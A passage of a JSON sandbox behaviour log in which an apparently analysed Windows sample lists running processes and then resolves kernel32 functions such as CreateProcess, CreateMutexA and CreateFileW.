"ProcessId", "value": "1220" } ], "repeated": 0, "id": 1010 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "msedge.exe" }, { "name": "ProcessId", "value": "7748" } ], "repeated": 0, "id": 1011 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "msedge.exe" }, { "name": "ProcessId", "value": "8948" } ], "repeated": 0, "id": 1012 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "msedge.exe" }, { "name": "ProcessId", "value": "736" } ], "repeated": 0, "id": 1013 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "msedge.exe" }, { "name": "ProcessId", "value": "9672" } ], "repeated": 0, "id": 1014 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "msedge.exe" }, { "name": "ProcessId", "value": "448" } ], "repeated": 0, "id": 1015 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "msedge.exe" }, { "name": "ProcessId", "value": "1028" } ], "repeated": 0, "id": 1016 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "4592" } ], "repeated": 0, "id": 1017 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "PhoneExperienceHost.exe" }, { "name": "ProcessId", "value": "664" } ], "repeated": 0, "id": 1018 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "10524" } ], "repeated": 0, "id": 1019 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "8212" } ], "repeated": 0, "id": 1020 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "smartscreen.exe" }, { "name": "ProcessId", "value": "5164" } ], "repeated": 0, "id": 1021 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "2748" } ], "repeated": 0, "id": 1022 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "8704" } ], "repeated": 0, "id": 1023 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "upfc.exe" }, { "name": "ProcessId", "value": "8116" } ], "repeated": 0, "id": 1024 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "MicrosoftEdgeUpdate.exe" }, { "name": "ProcessId", "value": "9036" } ], "repeated": 0, "id": 1025 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "updater.exe" }, { "name": "ProcessId", "value": "4748" } ], "repeated": 0, "id": 1026 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "taskhostw.exe" }, { "name": "ProcessId", "value": "10512" } ], "repeated": 0, "id": 1027 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "MicrosoftEdgeUpdate.exe" }, { "name": "ProcessId", "value": "6768" } ], "repeated": 0, "id": 1028 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "CompatTelRunner.exe" }, { "name": "ProcessId", "value": "9944" } ], "repeated": 0, "id": 1029 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "OneDriveStandaloneUpdater.exe" }, { "name": "ProcessId", "value": "1184" } ], "repeated": 0, "id": 1030 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "OneDriveStandaloneUpdater.exe" }, { "name": "ProcessId", "value": "9208" } ], "repeated": 0, "id": 1031 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "TrustedInstaller.exe" }, { "name": "ProcessId", "value": "4816" } ], "repeated": 0, "id": 1032 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "10340" } ], "repeated": 0, "id": 1033 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "TiWorker.exe" }, { "name": "ProcessId", "value": "8656" } ], "repeated": 0, "id": 1034 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "conhost.exe" }, { "name": "ProcessId", "value": "3964" } ], "repeated": 0, "id": 1035 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "3228" } ], "repeated": 0, "id": 1036 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "HxTsr.exe" }, { "name": "ProcessId", "value": "8760" } ], "repeated": 0, "id": 1037 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "backgroundTaskHost.exe" }, { "name": "ProcessId", "value": "1476" } ], "repeated": 0, "id": 1038 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "backgroundTaskHost.exe" }, { "name": "ProcessId", "value": "3832" } ], "repeated": 0, "id": 1039 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "backgroundTaskHost.exe" }, { "name": "ProcessId", "value": "7904" } ], "repeated": 0, "id": 1040 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "backgroundTaskHost.exe" }, { "name": "ProcessId", "value": "3860" } ], "repeated": 0, "id": 1041 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "backgroundTaskHost.exe" }, { "name": "ProcessId", "value": "8056" } ], "repeated": 0, "id": 1042 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "updater.exe" }, { "name": "ProcessId", "value": "10672" } ], "repeated": 0, "id": 1043 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "sppsvc.exe" }, { "name": "ProcessId", "value": "7028" } ], "repeated": 0, "id": 1044 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "5228" } ], "repeated": 0, "id": 1045 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "3272" } ], "repeated": 0, "id": 1046 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "updater.exe" }, { "name": "ProcessId", "value": "8788" } ], "repeated": 0, "id": 1047 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "updater.exe" }, { "name": "ProcessId", "value": "5356" } ], "repeated": 0, "id": 1048 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "9400" } ], "repeated": 0, "id": 1049 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "SppExtComObj.Exe" }, { "name": "ProcessId", "value": "6000" } ], "repeated": 0, "id": 1050 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "updater.exe" }, { "name": "ProcessId", "value": "4228" } ], "repeated": 0, "id": 1051 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "updater.exe" }, { "name": "ProcessId", "value": "5700" } ], "repeated": 0, "id": 1052 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "CompatTelRunner.exe" }, { "name": "ProcessId", "value": "5212" } ], "repeated": 0, "id": 1053 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "audiodg.exe" }, { "name": "ProcessId", "value": "10536" } ], "repeated": 0, "id": 1054 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "RuntimeBroker.exe" }, { "name": "ProcessId", "value": "3236" } ], "repeated": 0, "id": 1055 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "backgroundTaskHost.exe" }, { "name": "ProcessId", "value": "6308" } ], "repeated": 0, "id": 1056 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "backgroundTaskHost.exe" }, { "name": "ProcessId", "value": "3092" } ], "repeated": 0, "id": 1057 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "backgroundTaskHost.exe" }, { "name": "ProcessId", "value": "9488" } ], "repeated": 0, "id": 1058 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "RuntimeBroker.exe" }, { "name": "ProcessId", "value": "5448" } ], "repeated": 0, "id": 1059 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "backgroundTaskHost.exe" }, { "name": "ProcessId", "value": "1256" } ], "repeated": 0, "id": 1060 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "backgroundTaskHost.exe" }, { "name": "ProcessId", "value": "10548" } ], "repeated": 0, "id": 1061 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "RuntimeBroker.exe" }, { "name": "ProcessId", "value": "10780" } ], "repeated": 0, "id": 1062 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "backgroundTaskHost.exe" }, { "name": "ProcessId", "value": "3408" } ], "repeated": 0, "id": 1063 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "backgroundTaskHost.exe" }, { "name": "ProcessId", "value": "10080" } ], "repeated": 0, "id": 1064 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "RuntimeBroker.exe" }, { "name": "ProcessId", "value": "5652" } ], "repeated": 0, "id": 1065 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "RuntimeBroker.exe" }, { "name": "ProcessId", "value": "10772" } ], "repeated": 0, "id": 1066 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "7988" } ], "repeated": 0, "id": 1067 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "WmiPrvSE.exe" }, { "name": "ProcessId", "value": "10764" } ], "repeated": 0, "id": 1068 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "6716" } ], "repeated": 0, "id": 1069 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "f1e62c0e7345fc825586.exe" }, { "name": "ProcessId", "value": "4492" } ], "repeated": 0, "id": 1070 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "dllhost.exe" }, { "name": "ProcessId", "value": "8168" } ], "repeated": 0, "id": 1071 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": false, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 1072 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e31", "parentcaller": "0x00409be6", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002d4" } ], "repeated": 0, "id": 1073 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004074e9", "parentcaller": "0x00409c49", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "kernel32.dll" }, { "name": "BaseAddress", "value": "0x75860000" } ], "repeated": 0, "id": 1074 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004074f0", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetProcAddress" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7587f7f0" } ], "repeated": 0, "id": 1075 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004074ff", "parentcaller": "0x00409c49", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "kernel32.dll" }, { "name": "BaseAddress", "value": "0x75860000" } ], "repeated": 0, "id": 1076 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407506", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetModuleHandleA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75880d00" } ], "repeated": 0, "id": 1077 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407516", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 1078 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407519", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetModuleFileNameA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758810d0" } ], "repeated": 0, "id": 1079 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x0040752d", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 1080 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407530", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetModuleFileNameW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75880ba0" } ], "repeated": 0, "id": 1081 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407544", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 1082 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407547", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CreateProcessA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75895130" } ], "repeated": 0, "id": 1083 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407555", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 1084 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407558", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CreateProcessW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758788e0" } ], "repeated": 0, "id": 1085 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407565", "parentcaller": "0x00409c49", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "kernel32.dll" }, { "name": "BaseAddress", "value": "0x75860000" } ], "repeated": 0, "id": 1086 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407568", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CloseHandle" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883150" } ], "repeated": 0, "id": 1087 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407576", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 1088 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407579", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "OpenMutexA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75872e60" } ], "repeated": 0, "id": 1089 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x0040758d", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 1090 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407590", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CreateMutexA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758831e0" } ], "repeated": 0, "id": 1091 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004075a4", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 1092 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004075a7", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CreateFileA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758833a0" } ], "repeated": 0, "id": 1093 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004075bb", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 1094 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004075be", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CreateFileW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758833b0" } ], "repeated": 0, "id": 1095 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004075cf", 